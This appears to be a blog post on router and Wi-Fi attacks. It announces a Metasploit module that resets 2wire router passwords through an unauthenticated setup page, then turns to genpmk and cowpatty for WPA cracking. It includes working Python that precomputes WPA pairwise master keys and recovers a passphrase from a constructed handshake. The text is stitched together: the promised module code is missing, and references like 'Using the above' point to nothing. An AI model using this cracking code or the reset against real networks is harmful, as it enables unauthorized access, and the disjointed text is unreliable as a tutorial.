Wednesday, June 22, 2011

UPDATE: This module is now part of Metasploit. Just run msfupdate and it should be under auxiliary/admin/2wire/xslt_password_reset. For details, see here

Here is a Metasploit module I coded to reset the password on a 2wire router. It uses a setup-wizard page that neither verifies that the user is authenticated nor removes itself after first-time setup, so anyone who can reach the page can use it to reset the password. Without further delay, here is the code.

On my Ubuntu box I placed this under /opt/metasploit3/msf3/modules/auxiliary/admin/2wire/2wirepasswordreset.rb

So, to generate a rainbow table we need to give genpmk a dictionary, an SSID, and an output file for it to write the hashes to. Using the above, we can do the following:

genpmk -f final-wordlist.txt -s HackMe -d HackMe

This will make it create a table called "HackMe" containing a hash (the WPA pairwise master key) of every password in the file "final-wordlist.txt", salted with the SSID "HackMe". Strictly speaking this is a precomputed lookup table rather than a true rainbow table, and because the SSID is the salt it is only useful against networks with that exact SSID. The shell output should update every 1,000 hashes.

The whole process doesn't actually take that long, and the table built from the password file I suggest is about 40 MB. Not too bad considering the speed boost it gives when you go to crack the handshake.

Cowpatty is a great tool for cracking WPA/WPA2-PSK keys, either with a dictionary attack or with precomputed tables. All it needs is to see a client connect to the network (the four-way "handshake"). However, cowpatty isn't perfect and sometimes reads handshakes incorrectly. After looking into this I found a way to install it with the patch on my Ubuntu box.
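To make clear what genpmk and cowpatty are actually doing, here is an added example in Python (written for this page; it is not code from the original post, from genpmk, or from cowpatty). The first part computes the PMK the way WPA/WPA2-PSK defines it, PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt, which is why a genpmk table is bound to one SSID. The second part does what cowpatty does with a captured handshake: derive the PTK from each candidate PMK, compute the EAPOL MIC, and compare. The MAC addresses, nonces, EAPOL frame and wordlist are constructed for the demo, not a real capture; the "password"/"IEEE" pair is the IEEE 802.11i test vector.

```python
import hashlib
import hmac

# --- PMK precomputation (what genpmk does for a wordlist and one SSID) ---

def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK master key: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    The SSID is the salt, so a precomputed table is only valid for that one SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)

def build_pmk_table(wordlist, ssid: str) -> dict:
    """Precompute a PMK for every candidate (the expensive step, done once per SSID)."""
    return {pw: pmk_from_passphrase(pw, ssid) for pw in wordlist}

# --- Handshake verification (what cowpatty does with a captured 4-way handshake) ---

def prf512(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11i PRF-512: derive the 64-byte PTK from the PMK, both MACs and both nonces."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    label = b"Pairwise key expansion"
    out = b""
    for i in range(4):  # 4 x 20 bytes of HMAC-SHA1 output, truncated to 64
        out += hmac.new(pmk, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]

def eapol_mic(kck: bytes, eapol_frame: bytes, wpa2: bool = True) -> bytes:
    """MIC over the EAPOL-Key frame (MIC field zeroed): HMAC-SHA1 truncated to 16 bytes
    for WPA2/CCMP, HMAC-MD5 for WPA/TKIP. The KCK is the first 16 bytes of the PTK."""
    if wpa2:
        return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]
    return hmac.new(kck, eapol_frame, hashlib.md5).digest()

def crack_handshake(pmk_table, aa, spa, anonce, snonce, eapol_zeroed, mic, wpa2=True):
    """Try each precomputed PMK: PTK -> KCK -> MIC, compare with the captured MIC.
    No PBKDF2 runs here, which is why a precomputed table makes this pass so fast."""
    for passphrase, pmk in pmk_table.items():
        kck = prf512(pmk, aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_zeroed, wpa2), mic):
            return passphrase
    return None

# --- Constructed demo handshake (not a real capture; values chosen for illustration) ---

DEMO_SSID = "HackMe"
DEMO_PASSPHRASE = "HackMe123"
DEMO_WORDLIST = ["password", "letmein", "HackMe123", "12345678"]
DEMO_AA = bytes.fromhex("001122334455")   # access point (authenticator) MAC
DEMO_SPA = bytes.fromhex("66778899aabb")  # client (supplicant) MAC
DEMO_ANONCE = bytes(range(32))
DEMO_SNONCE = bytes(range(32, 64))
# EAPOL-Key message 2 (RSN descriptor) with its 16-byte MIC field zeroed: EAPOL header,
# descriptor type, key info, key length, replay counter, SNonce, IV, RSC, ID, MIC, data len.
DEMO_EAPOL = (bytes.fromhex("0103005f" "02" "010a" "0000" "0000000000000001")
              + DEMO_SNONCE + bytes(16) + bytes(8) + bytes(8) + bytes(16) + bytes(2))

def demo_captured_mic() -> bytes:
    """The MIC a client using DEMO_PASSPHRASE would have put in message 2 of the handshake."""
    pmk = pmk_from_passphrase(DEMO_PASSPHRASE, DEMO_SSID)
    kck = prf512(pmk, DEMO_AA, DEMO_SPA, DEMO_ANONCE, DEMO_SNONCE)[:16]
    return eapol_mic(kck, DEMO_EAPOL)

def run_demo(table_ssid: str = DEMO_SSID):
    """Build a table for table_ssid and run it against the demo handshake. Returns the
    recovered passphrase, or None (e.g. when the table was built for another SSID)."""
    table = build_pmk_table(DEMO_WORDLIST, table_ssid)
    return crack_handshake(table, DEMO_AA, DEMO_SPA, DEMO_ANONCE, DEMO_SNONCE,
                           DEMO_EAPOL, demo_captured_mic())

if __name__ == "__main__":
    print("PMK(password, IEEE) =", pmk_from_passphrase("password", "IEEE").hex())
    print("table built for HackMe ->", run_demo())
    print("table built for Other  ->", run_demo("Other"))
```

The split between build_pmk_table and crack_handshake is the whole point of genpmk: the 4096-round PBKDF2 per candidate is what costs time, and it depends only on the passphrase and SSID, so it can be done once and reused against every handshake captured from that SSID. The second run, with a table built for a different SSID, returns None even though the right passphrase is in the wordlist.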

First we need to download the required files. If you already have them you can skip this step.